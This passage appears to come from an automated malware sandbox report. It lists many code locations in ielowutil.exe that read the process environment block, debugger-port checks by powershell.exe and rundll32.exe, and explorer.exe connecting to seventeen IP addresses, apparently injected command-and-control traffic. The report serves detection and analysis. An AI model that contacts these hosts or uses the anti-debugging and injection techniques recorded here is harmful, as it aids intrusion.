Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8CD8A mov eax, dword ptr fs:[00000030h] 21_2_1EE8CD8A
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8CD8A mov eax, dword ptr fs:[00000030h] 21_2_1EE8CD8A
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE96D91 mov eax, dword ptr fs:[00000030h] 21_2_1EE96D91
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA5D60 mov eax, dword ptr fs:[00000030h] 21_2_1EEA5D60
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF36D79 mov esi, dword ptr fs:[00000030h] 21_2_1EF36D79
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF15D60 mov eax, dword ptr fs:[00000030h] 21_2_1EF15D60
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF65D65 mov eax, dword ptr fs:[00000030h] 21_2_1EF65D65
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECBD71 mov eax, dword ptr fs:[00000030h] 21_2_1EECBD71
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECBD71 mov eax, dword ptr fs:[00000030h] 21_2_1EECBD71
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEADD4D mov eax, dword ptr fs:[00000030h] 21_2_1EEADD4D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEADD4D mov eax, dword ptr fs:[00000030h] 21_2_1EEADD4D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEADD4D mov eax, dword ptr fs:[00000030h] 21_2_1EEADD4D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE89D46 mov eax, dword ptr fs:[00000030h] 21_2_1EE89D46
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE89D46 mov eax, dword ptr fs:[00000030h] 21_2_1EE89D46
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE89D46 mov ecx, dword ptr fs:[00000030h] 21_2_1EE89D46
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF11D5E mov eax, dword ptr fs:[00000030h] 21_2_1EF11D5E
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0CD40 mov eax, dword ptr fs:[00000030h] 21_2_1EF0CD40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0CD40 mov eax, dword ptr fs:[00000030h] 21_2_1EF0CD40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF55D43 mov eax, dword ptr fs:[00000030h] 21_2_1EF55D43
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF55D43 mov eax, dword ptr fs:[00000030h] 21_2_1EF55D43
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE91D50 mov eax, dword ptr fs:[00000030h] 21_2_1EE91D50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE91D50 mov eax, dword ptr fs:[00000030h] 21_2_1EE91D50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF64D4B mov eax, dword ptr fs:[00000030h] 21_2_1EF64D4B
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8FD20 mov eax, dword ptr fs:[00000030h] 21_2_1EE8FD20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBAD20 mov eax, dword ptr fs:[00000030h] 21_2_1EEBAD20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBAD20 mov eax, dword ptr fs:[00000030h] 21_2_1EEBAD20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBAD20 mov eax, dword ptr fs:[00000030h] 21_2_1EEBAD20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBAD20 mov ecx, dword ptr fs:[00000030h] 21_2_1EEBAD20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBAD20 mov eax, dword ptr fs:[00000030h] 21_2_1EEBAD20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBAD20 mov eax, dword ptr fs:[00000030h] 21_2_1EEBAD20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBAD20 mov eax, dword ptr fs:[00000030h] 21_2_1EEBAD20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBAD20 mov eax, dword ptr fs:[00000030h] 21_2_1EEBAD20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBAD20 mov eax, dword ptr fs:[00000030h] 21_2_1EEBAD20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBAD20 mov eax, dword ptr fs:[00000030h] 21_2_1EEBAD20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40D24 mov eax, dword ptr fs:[00000030h] 21_2_1EF40D24
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40D24 mov eax, dword ptr fs:[00000030h] 21_2_1EF40D24
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40D24 mov eax, dword ptr fs:[00000030h] 21_2_1EF40D24
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40D24 mov eax, dword ptr fs:[00000030h] 21_2_1EF40D24
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AD00 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AD00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AD00 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AD00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AD00 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AD00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AD00 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AD00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AD00 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AD00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AD00 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AD00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEB0D01 mov eax, dword ptr fs:[00000030h] 21_2_1EEB0D01
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF28D0A mov eax, dword ptr fs:[00000030h] 21_2_1EF28D0A
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBCD10 mov eax, dword ptr fs:[00000030h] 21_2_1EEBCD10
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBCD10 mov ecx, dword ptr fs:[00000030h] 21_2_1EEBCD10
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4BD08 mov eax, dword ptr fs:[00000030h] 21_2_1EF4BD08
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4BD08 mov eax, dword ptr fs:[00000030h] 21_2_1EF4BD08
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEB0AEB mov eax, dword ptr fs:[00000030h] 21_2_1EEB0AEB
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEB0AEB mov eax, dword ptr fs:[00000030h] 21_2_1EEB0AEB
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEB0AEB mov eax, dword ptr fs:[00000030h] 21_2_1EEB0AEB
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8FAEC mov edi, dword ptr fs:[00000030h] 21_2_1EE8FAEC
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE90AED mov eax, dword ptr fs:[00000030h] 21_2_1EE90AED
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE90AED mov eax, dword ptr fs:[00000030h] 21_2_1EE90AED
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE90AED mov eax, dword ptr fs:[00000030h] 21_2_1EE90AED
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE99AE4 mov eax, dword ptr fs:[00000030h] 21_2_1EE99AE4
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF10AFF mov eax, dword ptr fs:[00000030h] 21_2_1EF10AFF
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF10AFF mov eax, dword ptr fs:[00000030h] 21_2_1EF10AFF
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF10AFF mov eax, dword ptr fs:[00000030h] 21_2_1EF10AFF
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA3AF6 mov eax, dword ptr fs:[00000030h] 21_2_1EEA3AF6
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA3AF6 mov eax, dword ptr fs:[00000030h] 21_2_1EEA3AF6
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA3AF6 mov eax, dword ptr fs:[00000030h] 21_2_1EEA3AF6
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA3AF6 mov eax, dword ptr fs:[00000030h] 21_2_1EEA3AF6
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA3AF6 mov eax, dword ptr fs:[00000030h] 21_2_1EEA3AF6
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF64AE8 mov eax, dword ptr fs:[00000030h] 21_2_1EF64AE8
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA0ACE mov eax, dword ptr fs:[00000030h] 21_2_1EEA0ACE
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA0ACE mov eax, dword ptr fs:[00000030h] 21_2_1EEA0ACE
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBDAC0 mov eax, dword ptr fs:[00000030h] 21_2_1EEBDAC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBDAC0 mov eax, dword ptr fs:[00000030h] 21_2_1EEBDAC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBDAC0 mov eax, dword ptr fs:[00000030h] 21_2_1EEBDAC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBDAC0 mov eax, dword ptr fs:[00000030h] 21_2_1EEBDAC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBDAC0 mov eax, dword ptr fs:[00000030h] 21_2_1EEBDAC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBDAC0 mov eax, dword ptr fs:[00000030h] 21_2_1EEBDAC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF37ABE mov eax, dword ptr fs:[00000030h] 21_2_1EF37ABE
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC9ABF mov eax, dword ptr fs:[00000030h] 21_2_1EEC9ABF
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC9ABF mov eax, dword ptr fs:[00000030h] 21_2_1EEC9ABF
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC9ABF mov eax, dword ptr fs:[00000030h] 21_2_1EEC9ABF
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4DAAF mov eax, dword ptr fs:[00000030h] 21_2_1EF4DAAF
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8BA80 mov eax, dword ptr fs:[00000030h] 21_2_1EE8BA80
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF46A80 mov eax, dword ptr fs:[00000030h] 21_2_1EF46A80
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5BA66 mov eax, dword ptr fs:[00000030h] 21_2_1EF5BA66
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5BA66 mov eax, dword ptr fs:[00000030h] 21_2_1EF5BA66
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5BA66 mov eax, dword ptr fs:[00000030h] 21_2_1EF5BA66
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5BA66 mov eax, dword ptr fs:[00000030h] 21_2_1EF5BA66
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC9A48 mov eax, dword ptr fs:[00000030h] 21_2_1EEC9A48
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC9A48 mov eax, dword ptr fs:[00000030h] 21_2_1EEC9A48
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF14A57 mov eax, dword ptr fs:[00000030h] 21_2_1EF14A57
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF14A57 mov eax, dword ptr fs:[00000030h] 21_2_1EF14A57
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBEA40 mov eax, dword ptr fs:[00000030h] 21_2_1EEBEA40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBEA40 mov eax, dword ptr fs:[00000030h] 21_2_1EEBEA40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8FA44 mov ecx, dword ptr fs:[00000030h] 21_2_1EE8FA44
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF1DA40 mov eax, dword ptr fs:[00000030h] 21_2_1EF1DA40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF2AA40 mov eax, dword ptr fs:[00000030h] 21_2_1EF2AA40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF2AA40 mov eax, dword ptr fs:[00000030h] 21_2_1EF2AA40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF1DA31 mov eax, dword ptr fs:[00000030h] 21_2_1EF1DA31
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4DA30 mov eax, dword ptr fs:[00000030h] 21_2_1EF4DA30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBDA20 mov eax, dword ptr fs:[00000030h] 21_2_1EEBDA20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBDA20 mov eax, dword ptr fs:[00000030h] 21_2_1EEBDA20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBDA20 mov eax, dword ptr fs:[00000030h] 21_2_1EEBDA20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBDA20 mov eax, dword ptr fs:[00000030h] 21_2_1EEBDA20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBDA20 mov eax, dword ptr fs:[00000030h] 21_2_1EEBDA20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBDA20 mov edx, dword ptr fs:[00000030h] 21_2_1EEBDA20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE91A24 mov eax, dword ptr fs:[00000030h] 21_2_1EE91A24
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE91A24 mov eax, dword ptr fs:[00000030h] 21_2_1EE91A24
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE87A30 mov eax, dword ptr fs:[00000030h] 21_2_1EE87A30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE87A30 mov eax, dword ptr fs:[00000030h] 21_2_1EE87A30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE87A30 mov eax, dword ptr fs:[00000030h] 21_2_1EE87A30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECAA0E mov eax, dword ptr fs:[00000030h] 21_2_1EECAA0E
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECAA0E mov eax, dword ptr fs:[00000030h] 21_2_1EECAA0E
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC5BE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEC5BE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC5BE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEC5BE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1BE7 mov eax, dword ptr fs:[00000030h] 21_2_1EEA1BE7
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1BE7 mov eax, dword ptr fs:[00000030h] 21_2_1EEA1BE7
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF64BE0 mov eax, dword ptr fs:[00000030h] 21_2_1EF64BE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE87BF0 mov eax, dword ptr fs:[00000030h] 21_2_1EE87BF0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE87BF0 mov ecx, dword ptr fs:[00000030h] 21_2_1EE87BF0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE87BF0 mov eax, dword ptr fs:[00000030h] 21_2_1EE87BF0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE87BF0 mov eax, dword ptr fs:[00000030h] 21_2_1EE87BF0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8EBC0 mov eax, dword ptr fs:[00000030h] 21_2_1EE8EBC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBFBC0 mov ecx, dword ptr fs:[00000030h] 21_2_1EEBFBC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBFBC0 mov eax, dword ptr fs:[00000030h] 21_2_1EEBFBC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBFBC0 mov eax, dword ptr fs:[00000030h] 21_2_1EEBFBC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBFBC0 mov eax, dword ptr fs:[00000030h] 21_2_1EEBFBC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBFBC0 mov eax, dword ptr fs:[00000030h] 21_2_1EEBFBC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECBBC0 mov eax, dword ptr fs:[00000030h] 21_2_1EECBBC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECBBC0 mov eax, dword ptr fs:[00000030h] 21_2_1EECBBC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECBBC0 mov ecx, dword ptr fs:[00000030h] 21_2_1EECBBC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECBBC0 mov eax, dword ptr fs:[00000030h] 21_2_1EECBBC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF36BDE mov ebx, dword ptr fs:[00000030h] 21_2_1EF36BDE
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF36BDE mov eax, dword ptr fs:[00000030h] 21_2_1EF36BDE
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF14BC0 mov eax, dword ptr fs:[00000030h] 21_2_1EF14BC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF14BC0 mov eax, dword ptr fs:[00000030h] 21_2_1EF14BC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF14BC0 mov eax, dword ptr fs:[00000030h] 21_2_1EF14BC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF14BC0 mov eax, dword ptr fs:[00000030h] 21_2_1EF14BC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0FBC2 mov eax, dword ptr fs:[00000030h] 21_2_1EF0FBC2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEB8BD1 mov eax, dword ptr fs:[00000030h] 21_2_1EEB8BD1
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEB8BD1 mov eax, dword ptr fs:[00000030h] 21_2_1EEB8BD1
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF58BBE mov eax, dword ptr fs:[00000030h] 21_2_1EF58BBE
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF58BBE mov eax, dword ptr fs:[00000030h] 21_2_1EF58BBE
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF58BBE mov eax, dword ptr fs:[00000030h] 21_2_1EF58BBE
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF58BBE mov eax, dword ptr fs:[00000030h] 21_2_1EF58BBE
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE93BA4 mov eax, dword ptr fs:[00000030h] 21_2_1EE93BA4
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE93BA4 mov eax, dword ptr fs:[00000030h] 21_2_1EE93BA4
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE93BA4 mov eax, dword ptr fs:[00000030h] 21_2_1EE93BA4
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE93BA4 mov eax, dword ptr fs:[00000030h] 21_2_1EE93BA4
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF1DB90 mov eax, dword ptr fs:[00000030h] 21_2_1EF1DB90
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF11B93 mov eax, dword ptr fs:[00000030h] 21_2_1EF11B93
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1B80 mov eax, dword ptr fs:[00000030h] 21_2_1EEA1B80
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC1B9C mov eax, dword ptr fs:[00000030h] 21_2_1EEC1B9C
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF46B77 mov eax, dword ptr fs:[00000030h] 21_2_1EF46B77
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF64B67 mov eax, dword ptr fs:[00000030h] 21_2_1EF64B67
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE87B7D mov eax, dword ptr fs:[00000030h] 21_2_1EE87B7D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE87B7D mov ecx, dword ptr fs:[00000030h] 21_2_1EE87B7D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC4B79 mov eax, dword ptr fs:[00000030h] 21_2_1EEC4B79
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AB70 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AB70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AB70 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AB70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AB70 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AB70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AB70 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AB70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AB70 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AB70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AB70 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AB70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE96B70 mov eax, dword ptr fs:[00000030h] 21_2_1EE96B70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE96B70 mov eax, dword ptr fs:[00000030h] 21_2_1EE96B70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE96B70 mov eax, dword ptr fs:[00000030h] 21_2_1EE96B70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF1FB45 mov eax, dword ptr fs:[00000030h] 21_2_1EF1FB45
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4BB40 mov ecx, dword ptr fs:[00000030h] 21_2_1EF4BB40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4BB40 mov eax, dword ptr fs:[00000030h] 21_2_1EF4BB40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECBB5B mov esi, dword ptr fs:[00000030h] 21_2_1EECBB5B
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECCB20 mov eax, dword ptr fs:[00000030h] 21_2_1EECCB20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF1CB20 mov eax, dword ptr fs:[00000030h] 21_2_1EF1CB20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF1CB20 mov eax, dword ptr fs:[00000030h] 21_2_1EF1CB20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF1CB20 mov eax, dword ptr fs:[00000030h] 21_2_1EF1CB20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF1DB2A mov eax, dword ptr fs:[00000030h] 21_2_1EF1DB2A
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2ED0 NtResumeThread,LdrInitializeThunk, 21_2_1EED2ED0

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 103.150.61.226 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 66.29.155.228 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.27.134.153 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 145.14.153.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.51.250 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 142.250.185.179 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.210.161.216 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 89.46.108.25 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 216.18.208.202 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.95.96.29 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.23.227.120 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.178 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 130.211.17.207 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.80.183.133 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 217.21.87.131 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.95.160.71 80 Jump to behavior
